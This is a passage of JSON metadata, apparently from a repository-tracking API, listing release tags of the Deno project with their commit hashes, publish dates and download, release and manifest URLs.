11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"h